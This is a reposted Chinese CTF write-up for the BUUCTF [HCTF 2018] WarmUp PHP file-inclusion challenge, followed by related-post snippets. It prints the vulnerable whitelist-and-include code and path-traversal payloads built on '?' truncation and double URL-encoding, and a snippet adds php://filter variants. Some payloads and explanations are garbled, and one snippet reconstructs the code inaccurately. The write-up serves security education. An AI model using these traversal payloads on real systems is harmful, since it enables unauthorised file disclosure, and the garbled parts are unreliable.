【buuctf】[HCTF 2018]WarmUp

最新推荐文章于 2025-06-02 11:32:48 发布
转载 最新推荐文章于 2025-06-02 11:32:48 发布 · 586 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://www.cnblogs.com/xhds/p/12266072.html
文章标签:

#ctf #代码审计 #安全漏洞 #web渗透

本文详细解析了HCTF2018 WarmUp题目中的文件包含漏洞,介绍了如何通过构造特定的URL参数来绕过检查机制,最终成功获取flag。

题目:[HCTF 2018]WarmUp

在这里插入图片描述
根据提示进行代码审计(文件包含)

解题思路

访问链接
在这里插入图片描述
查看网页源代码 发现source.php
在这里插入图片描述
直接访问发现是index.php的源代码,里面还有一个hint.php
在这里插入图片描述
访问hint.php得到提示flag 在 ffffllllaaaagggg 里,很显然/index.php?file=hint.php 是一个文件包含,不知道flag的具体目录层次,因此构造时候需要通过/index.php?file=source.php/../../ffffllllaaaagggg依次通过…/…/构造尝试,去查看到底是几层的根目录
最后成功尝试

payload:index.php?file=source.php?../../../../../ffffllllaaaagggg

payload代码执行流程

第1个if返回false
第2个if返回false
$_page=source.php
第3个if返回true,退出checkFile函数,此时核心代码中已满足if(true&&true&&true),即执行include函数
最后include(source.php?../../../../../../ffffllllaaaagggg)*/

flag{5ced1058-8ae5-437a-84eb-16b23cf0b8db}

进行代码审计

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        //传入了变量page,也就是我们刚刚传进来的file
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; // 这里定义了白名单
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            /*为了返回 true 两个条件必须满足
            	1 page存在 
            	2 page是字符串 ,
            	这里和外层的判断file 一致基本是再次判断了一遍*/

            if (in_array($page, $whitelist)) {
                return true;
            }
            /*in_array(search,array,type) 函数搜索数组中是否存在指定的值,
			白名单过滤,需要返回了ture
			所以这里我们传入的page或者是经过截断之后的page必须是soure.php或hint.php,
			这里是正常的访问,我们需要构造文件任意包含,所以这里传入的不满足条件,这里不是注意的点,往下继续看*/

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            /*这里mb_sustr 是个截断,返回0到mb_strpos之间的内容,而mb_strps 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/

            if (in_array($_page, $whitelist)) {
                return true;
            }
            //这里和上面类似 查看_page 是否在白名单中

            $_page = urldecode($page);  // 这里发现对_page进行了一次decode解码
            $_page = mb_substr(			//获取两个??之间的内容
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            // 这里是我们要绕过的点,从这里往上看 尝试构造
            if (in_array($_page, $whitelist)) {      //白名单
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>
/*必须满足if条件,才能包含file,这里也可以猜到可能考的是文件包含: 
		1 REQUEST['file']不为空 
		2 REQUEST['file']是字符串 
		3 checkFile($_REQUEST['file']) 为ture,回到checkFile 函数分析如何返回true*/

整体利用的漏洞就是代码最后的include函数,利用文件包含漏洞,也就是需要include ffffllllaaaagggg文件,而且需要使用…/来绕过

可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求 page为字符串,否则返回false
第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true
第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true
第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f'),构造url:
所以我们的payload 就是

file=source.php?file=source.php%/…/…/…/…/…/ffffllllaaaagggg

==为什么urldecode没有用到?==查看网上很多的wp用到了,但这也是多此一举了,最后目标其实是一样的,checkFile返回true就可以
分析: 例如用到urldecode的payload:
http://ip/index.php?file=source.php%253f…/…/…/…/…/ffffllllaaaagggg

执行流程

第1个if返回false

第2个if返回false
page= source.php 第 3个if 返回 falseurldecode执行后, _page=source.php%3f../../../../../ffffllllaaaagggg 第3个if返回 false urldecode执行后, 
p
​	
 age=source.php第3个if返回falseurldecode执行后,_page=source.php?../…/…/…/…/ffffllllaaaagggg
执行mb_substr后$_page=source.php
return true
下面核心代码执行同理
最后include(source.php%253f…/…/…/…/…/ffffllllaaaagggg
web | CTFBUUCTF [HCTF 2018]WarmUp
weixin_46301214的博客
03-03 660
访问一下hint.php文件就告诉我们,flag在 ffffllllaaaagggg 这个文件里。hint.php 是必填的,然后重点来了,想要访问成其他文件,只需要继续拼接?拦截大概意思就是,我们输入:ffffllllaaaagggg。ffffllllaaaagggg == 数组里两个文件名吗?然后你会发现,这TM是五层目录啊,而且本地是无法复现出来的。发现文件,打开访问一下看看,发现是代码审计。这里经验灵感是 四个字,所以是四层目录。
[HCTF 2018]WarmUp
m0_62709637的博客
05-28 6913
这个题的前身是一个cve漏洞(phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)) 刚入坑的小伙伴不要慌,我们一步一步慢慢来看 点开题目,日常f12发现有提示,所以我们进行访问 发现是源代码,让我们进行阅读(分为两块1、主函数部分 2、外部类) 外部方法: 这里对两个函数进行解释查询以下资料 (关于mb_strpos函数在测试时发现如果没有匹配到指定符号,将返回字符串长度) 我们进行一些本地测试加深理解: 代码如下: c.
[HCTF 2018]WarmUp ——文件上传漏洞
weixin_46962006的博客
12-08 677
                       [HCTF 2018]WarmUp 1 前言        个人观点,若有误请指教 解题思路及步骤 由于点开后只是一个表情包,所以查看html源码,发现一个提示 根据提示访问source.php文件,正式开始代码审计环节 <?php highlight_file(__FILE__); class emmm { //&为引用,即在函数修改会改变外面的,但在这里应该没用,因为是通过这个$_REQU
CTF-BUUCTF-[HCTF 2018]WarmUp
qq_42404383的博客
12-24 5886
[HCTF 2018]WarmUp 题目: 知识点: 根据提示,毫无疑问,PHP代码审计 解题 一、访问链接 /index.php?file=hint.php 是一个文件包含,source.php 是 index.php 的源代码。 得到提示,flag 在 ffffllllaaaagggg 里 二、代码审计: <?php highlight_file(__FILE__); ...
BUUCTF [HCTF 2018]WarmUp
m0_49025459的博客
04-06 2277
题目 打开环境发现啥也没有,那就直接看看源码 源码,发现有个source.php,那么直接修改url访问一下子 <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible"
BUUCTF[HCTF 2018]WarmUp 1
10-21
【知识点解析】 1. **源代码查看与漏洞分析**: 在CTF(Capture The Flag)竞赛中,查看源代码是获取服务器端脚本逻辑的重要手段。通过观察源代码,可以理解程序的运行机制、判断逻辑和潜在漏洞。...
BUUCTF[HCTF 2018]WarmUp 1题解
最新发布
2301_79896143的博客
06-02 1149
BUUCTF[HCTF 2018]WarmUp题解:通过分析滑稽表情页面的PHP源码,发现文件包含漏洞。代码审计显示程序以白名单方式检查文件参数,但可通过构造payload绕过。利用hint.php提示的flag文件名,在参数后添加?/../../../../路径遍历访问根目录的ffffllllaaaagggg文件。最终通过多层../目录跳转获取flag{966bef86-ebda-43d8-8703-8e6a57b211de}。考察PHP代码审计和目录遍历漏洞利用能力。
BUUCTF——WebHCTF 2018 WarmUp
cai_huaer的博客
02-20 1014
ffffllllaaaagggg”,发现没有“you can't see it”提示,页面是一片空白后,应该是跑到了include那去了,只是可能位置不对。仔细看checkFile方法,发现当page值是hint.php/ffffllllaaaagggg时,下面方法是false。再看一下代码,如果是文件夹,那么我们能用include漏洞去文件包含,那么需要执行到include那一行代码,需要前面三个条件都为真。的字符串,只要符合$whitelist数组中的值就行,source.php和hint.php。
BUUCTF HCTF2018 WarmUp
Agineer的博客
05-17 686
简单的一道签到题 考代码审计和和PHP文件包含其它路径 打开是一张滑稽的图片,我个人非常喜欢这张图 不管啥,我先查看页面源代码 网页源代码 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta
BUUCTF: [HCTF 2018]WarmUp 1
emdog的博客
10-21 2941
1、打开链接,只有这个笑脸,首先想到的肯定是查看源码 2、按下F12或者是Ct+U查看源码,如下显示,可以看到有source.php注释 3、通过在原URL后添加/source.php,可查看到如下内容,进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { //传入变量,也就是file,赋值给page public static function checkFile(&$page
BUUCTF-[HCTF 2018]WarmUp
Nothing-one的博客
08-13 524
题目这里面给了我们提示,是代码审计。 这里面我们访问source.php这样我们可以获得这 <?php highlight_file(FILE); class emmm { public static function checkFile(&$page) //传入了变量page,也就是我们刚刚传进来的file { // 这里定义了白名单 whitelist=["source"=>"source.php","hint"=>"hint.php"];if(!isset(whiteli.
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
m0_62239233的博客
04-22 2329
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
BUU HCTF2018 WarmUP
yingyugo的博客
11-24 1491
开始BUUCTF受虐的第一天,好的,首先打开第一题,映入眼帘的就是这偌大的笑脸 然后ctrl+u出来源码看看 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-U
BUUCTF--[HCTF 2018]WarmUp
qq_46263951的博客
07-01 227
通过F12或者对网站进行扫描都可以找到source.php文件 进入之后我们可以看到还有一个hint文件,给出我们提示 highlight_file(__FILE__); //打印代码 class emmm //定义emmm类 { public static function checkFile(&$page)//将传入的参数赋给$page { $whitelist = ["source"=>"source.php","hint"=&gt..
BUUCTFHCTF2018 WarmUp
m0_68259687的博客
08-19 333
前面的部分重新赋予$page,且这部分必须包含source.php或者hint.php,因此我们可以猜出这个请求应该是。大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测为那个滑稽头像)可以看到 函数会检查file请求是否为空,是否是字符串等,且只有在参数中包含了source .php或者hint.php时才会生效。按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释。
[HCTF 2018]WarmUp 1
04-01
<think>好的,我现在需要帮用户解决HCTF 2018 WarmUp题目的解题思路。首先,我应该先回忆一下这个题目的基本情况。根据用户提供的引用内容,这题可能涉及到Web安全方面的挑战,比如CTF题目常见的漏洞类型,比如文件包含、代码审计等。 用户提到参考站内引用中的第三部分是关于[HCTF 2018]WarmUp的解题思路,所以首先需要从这些信息中提取关键点。根据引用中的描述,解题思路可能涉及几个步骤:首先访问页面,查看源代码;然后发现提示,比如source.php;接着分析该文件的内容,寻找可能的漏洞点,比如文件包含或PHP伪协议利用。 接下来,我需要详细拆解每个可能的步骤。比如,第一步访问网站后,查看页面源代码,可能会发现注释中的提示,例如source.php文件。访问这个文件后,可能会得到PHP代码,这时候需要进行代码审计。代码中可能存在文件包含漏洞,比如使用include或require函数,并且参数未经过滤或过滤不严。 在代码审计过程中,需要关注如何绕过安全措施。例如,代码中可能检查参数是否在白名单中,或者是否以特定字符串开头。这时候可能要用到目录穿越,比如使用../../../../etc/passwd这样的路径,或者利用PHP伪协议如php://filter来读取源代码。 另外,可能还需要考虑服务器的文件结构,比如flag文件的位置,常见的如/flag,/var/www/html/flag.txt等。通过构造合适的payload,利用文件包含漏洞来读取这些文件。 还需要注意题目是否有其他陷阱,比如需要绕过strpos检查,或者利用二次编码来绕过过滤。例如,如果代码检查参数是否以某个字符串开头,可以通过编码绕过,比如使用%2566来代表f,因为服务器可能进行两次URL解码。 然后,总结解题步骤:查看源代码找到提示文件,审计代码找漏洞点,构造payload绕过过滤,读取flag文件。同时,要确保每一步都符合题目的具体设置,可能不同的题目会有不同的过滤方式,需要根据实际情况调整payload。 最后,生成相关问题,覆盖文件包含漏洞、PHP伪协议、代码审计等方面,帮助用户深入理解相关知识点。</think>### [HCTF 2018]WarmUp 解题思路 #### 1. 初始页面与源代码分析 - 访问题目地址后,页面显示一个卡通笑脸表情。 - **关键操作**:查看页面源代码,发现注释中提示 `source.php`,访问该路径获取服务器端PHP代码[^1]。 #### 2. 代码审计关键点 ```php <?php class emmm { public static function checkFile(&$page) { $whitelist = ["source" => "source.php", "hint" => "hint.php"]; if (!isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr($page, 0, mb_strpos($page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?')); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (empty($_REQUEST['file'])) { include 'hint.php'; } else { $file = $_REQUEST['file']; if (emmm::checkFile($file)) { include $file; } else { echo "you can't see it"; } } ``` - **漏洞点**:`include $file` 存在文件包含漏洞,但需通过 `checkFile()` 校验。 - **绕过逻辑**: 1. `$whitelist` 白名单仅允许 `source.php` 和 `hint.php`。 2. 利用 `mb_substr` 截取 `?` 前的路径,结合多次URL解码绕过检查。 #### 3. 构造Payload读取flag - **hint.php提示**:`flag not here, and flag in ffffllllaaaagggg`(暗示flag文件路径)。 - **Payload构造**: ```url file=source.php?/../../../../../ffffllllaaaagggg ``` - 原理:利用 `?` 截断路径检查,通过目录穿越访问根目录下的目标文件。 #### 4. 其他绕过方式 - **PHP伪协议**(若服务器允许): ```url file=php://filter/read=convert.base64-encode/resource=ffffllllaaaagggg ``` - **二次URL编码**(应对严格过滤): ```url file=source.php%253F/..%252F..%252F..%252F..%252F..%252Fffffllllaaaagggg ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值